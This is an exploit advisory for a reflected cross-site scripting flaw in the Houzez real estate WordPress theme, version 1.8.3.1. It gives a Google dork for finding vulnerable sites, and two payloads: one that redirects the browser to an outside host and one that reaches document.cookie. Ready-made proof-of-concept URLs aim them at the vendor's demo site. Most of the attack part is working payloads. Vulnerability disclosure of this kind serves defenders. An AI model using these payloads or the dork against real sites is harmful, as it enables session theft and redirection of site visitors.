Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS

2020.01.11

m0ze (RU)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

Dork: /wp-content/themes/houzez/

# Exploit Title: Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS
# Google Dork: /wp-content/themes/houzez/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://houzez.co/
# Software Link: https://themeforest.net/item/houzez-real-estate-wordpress-theme/15752549
# Version: 1.8.3.1
# Tested on: Kali Linux
# CVE: -
# CWE: 79


----[]- Info: -[]----
Demo website: https://houzez04.favethemes.com/


----[]- Reflected XSS: -[]----
Payload Sample #0: "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample #1: "><img src=x onerror=alert(document.cookie)>

PoC #0: https://houzez04.favethemes.com/advanced-search/?keyword=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28%60m0ze%60%29%3Bwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location=&area=&status=&type=&bedrooms=&bathrooms=&min-area=&max-area=&min-price=%24200&max-price=%24500%2C000

PoC #1: https://houzez04.favethemes.com/agent/?agent_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&category=&city=

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Houzez - Real Estate WordPress Theme v1.8.3.1 Reflected XSS

Dork: /wp-content/themes/houzez/

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.